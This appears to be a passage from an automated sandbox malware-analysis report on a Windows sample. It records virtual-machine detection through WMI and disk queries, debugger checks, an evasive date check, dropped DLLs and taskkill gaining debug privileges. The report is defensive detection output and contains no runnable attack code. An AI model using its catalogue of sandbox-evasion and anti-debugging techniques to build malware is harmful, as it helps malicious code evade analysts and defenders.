Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : Select * from Win32_NetworkAdapter Where NetEnabled=TRUE
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : Select * from Win32_NetworkAdapter Where NetEnabled=TRUE
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : Select * from Win32_NetworkAdapter Where NetEnabled=TRUE
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\MoreInfo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\md5dll.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Program Files (x86)\Wimsys\uninstall.exe Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\SimpleSC.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\System.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\MoreInfo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Program Files (x86)\Wimsys\msg.exe Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\IpConfig.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\IpConfig.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\Public\wss_tmp\cr_ws_2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\inetc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\System.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\Public\fbe\fbegbhf.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\MoreInfo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\md5dll.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\SimpleSC.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\inetc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\System.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\IpConfig.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\md5dll.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\SimpleSC.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\inetc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\nsExec.dll Jump to dropped file
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\rundll32.exe API coverage: 4.0 %
Source: C:\Windows\System32\rundll32.exe API coverage: 7.6 %
Source: C:\Windows\System32\rundll32.exe API coverage: 1.9 %
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4C6B lstrcpynW,FindFirstFileW, 6_2_046A4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A30A4 FindFirstFileW,FindClose, 6_2_046A30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 6_2_046A2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C548A FindFirstFileExW, 6_2_046C548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 6_2_046B3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E4C6B lstrcpynW,FindFirstFileW, 7_2_045E4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E30A4 FindFirstFileW,FindClose, 7_2_045E30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 7_2_045E2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0460548A FindFirstFileExW, 7_2_0460548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 7_2_045F3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03452367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 15_2_03452367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034530A4 FindFirstFileW,FindClose, 15_2_034530A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03454C6B lstrcpynW,FindFirstFileW, 15_2_03454C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03463A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 15_2_03463A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0347548A FindFirstFileExW, 15_2_0347548A
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943F81C FindFirstFileExA, 33_2_0000021BD943F81C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885F81C FindFirstFileExA, 34_2_00000166D885F81C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F0510 FindFirstFileExW, 39_2_000001C9C66F0510
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CAC90 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_wfullpath,_errno,_errno,_errno,_wfullpath,IsRootUNCName,GetDriveTypeW,free,__loctotime64_t,free,_wsopen_s,_fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FindClose,__wdtoxmode,GetLastError,_dosmaperr,FindClose,GetLastError,_dosmaperr,FindClose, 39_2_000001C9C85CAC90
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: rundll32.exe, 0000000F.00000002.1529325871.000000000320A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-)
Source: svchost.exe, 0000000A.00000002.3167280672.0000019AED07F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000A.00000002.3166441898.0000019AED02B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000006.00000002.1532997737.0000000004D23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
Source: rundll32.exe, 00000006.00000002.1532068572.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWe
Source: rundll32.exe, 00000006.00000002.1532289168.0000000002EBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1531203206.0000000002EBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508449489.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.3165369436.0000019AED002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: rundll32.exe, 00000006.00000002.1532289168.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5=J
Source: svchost.exe, 0000000A.00000002.3167552753.0000019AED08C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 0000000F.00000003.1529014689.0000000003255000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529379708.0000000003255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPs,
Source: rundll32.exe, 00000007.00000003.1506478813.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: svchost.exe, 0000000A.00000002.3167280672.0000019AED064000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
Source: svchost.exe, 00000008.00000002.3166386079.00000257B862B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1349624943.000000000323D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1369333981.000000000323D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4F9B IsDebuggerPresent,OutputDebugStringW, 6_2_046B4F9B
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9797C80 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 33_2_0000021BD9797C80
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9431090 VirtualAlloc,VirtualProtect,LoadLibraryA,GetProcAddress, 33_2_0000021BD9431090
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C29 mov eax, dword ptr fs:[00000030h] 6_2_046C1C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB6DE mov ecx, dword ptr fs:[00000030h] 6_2_046BB6DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02E57444 mov eax, dword ptr fs:[00000030h] 6_2_02E57444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04601C29 mov eax, dword ptr fs:[00000030h] 7_2_04601C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045FB6DE mov ecx, dword ptr fs:[00000030h] 7_2_045FB6DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02D27364 mov eax, dword ptr fs:[00000030h] 7_2_02D27364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0346B6DE mov ecx, dword ptr fs:[00000030h] 15_2_0346B6DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03471C29 mov eax, dword ptr fs:[00000030h] 15_2_03471C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_032673E4 mov eax, dword ptr fs:[00000030h] 15_2_032673E4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C6017 GetProcessHeap, 6_2_046C6017
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4D53 SetUnhandledExceptionFilter, 6_2_046B4D53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B406B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_046B406B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4BC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_046B4BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B8BB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_046B8BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4BDE7D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6D4BDE7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4BE069 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6D4BE069
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F4D53 SetUnhandledExceptionFilter, 7_2_045F4D53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F406B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_045F406B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F4BC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_045F4BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F8BB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_045F8BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03464BC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_03464BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03468BB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_03468BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0346406B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_0346406B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03464D53 SetUnhandledExceptionFilter, 15_2_03464D53
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943A208 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 33_2_0000021BD943A208
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943D5D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 33_2_0000021BD943D5D0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD94460F8 SetUnhandledExceptionFilter, 33_2_0000021BD94460F8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D88660F8 SetUnhandledExceptionFilter, 34_2_00000166D88660F8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885D5D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00000166D885D5D0
